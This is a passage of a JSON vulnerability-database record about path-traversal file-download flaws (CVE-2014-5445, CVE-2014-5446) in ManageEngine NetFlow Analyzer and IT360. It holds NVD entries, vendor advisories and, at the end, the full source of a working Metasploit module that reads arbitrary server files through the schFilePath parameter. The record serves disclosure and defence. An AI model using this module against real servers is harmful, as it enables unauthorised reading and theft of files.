"cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.9:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.7:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:44:52", "description": "Multiple absolute path traversal vulnerabilities in ZOHO ManageEngine Netflow Analyzer 8.6 through 10.2 and IT360 10.3 allow remote attackers or remote authenticated users to read arbitrary files via a full pathname in the schFilePath parameter to the (1) CSVServlet or (2) CReportPDFServlet servlet.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-5445", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:10.2", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-5445", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5445", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.2:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:57:06", "description": "A directory traversal vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the filename parameter sent to the DisplayChartPDF servlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.", "cvss3": {}, "published": "2014-12-17T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine NetFlow Analyzer And IT360 DisplayChartPDF Directory Traversal (CVE-2014-5446)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5446"], "modified": "2014-12-17T00:00:00", "id": "CPAI-2014-2308", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:55:28", "description": "An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the schFilePath parameter sent to servlets in HTTP requests. 
A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to them.", "cvss3": {}, "published": "2014-12-31T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine NetFlow Analyzer And IT360 Multiple servlets Arbitrary File Download (CVE-2014-5445)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2015-01-12T00:00:00", "id": "CPAI-2014-2341", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-07T23:03:30", "description": "This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. 
Note that when typing Windows paths, you must escape the backslash with a backslash.\n", "edition": 2, "cvss3": {}, "published": "2014-11-30T00:12:37", "type": "metasploit", "title": "ManageEngine NetFlow Analyzer Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/NETFLOW_FILE_DOWNLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',\n 'Description' => %q{\n This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. 
Note that when typing Windows paths, you\n must escape the backslash with a backslash.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-5445' ],\n [ 'OSVDB', '115340' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],\n [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]\n ],\n 'DisclosureDate' => '2014-11-30'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI',\n [ true, \"The base path to NetFlow Analyzer\", '/netflow' ]),\n OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\\\windows\\\\system.ini']),\n ])\n end\n\n\n def run\n # Create request\n begin\n print_status(\"Downloading file #{datastore['FILEPATH']}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),\n 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] },\n })\n rescue Rex::ConnectionError\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200\n if res.body.to_s.bytesize == 0\n print_error(\"0 bytes returned, file does not exist or it is empty.\")\n return\n end\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'netflow.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Failed to download file.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/netflow_file_download.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}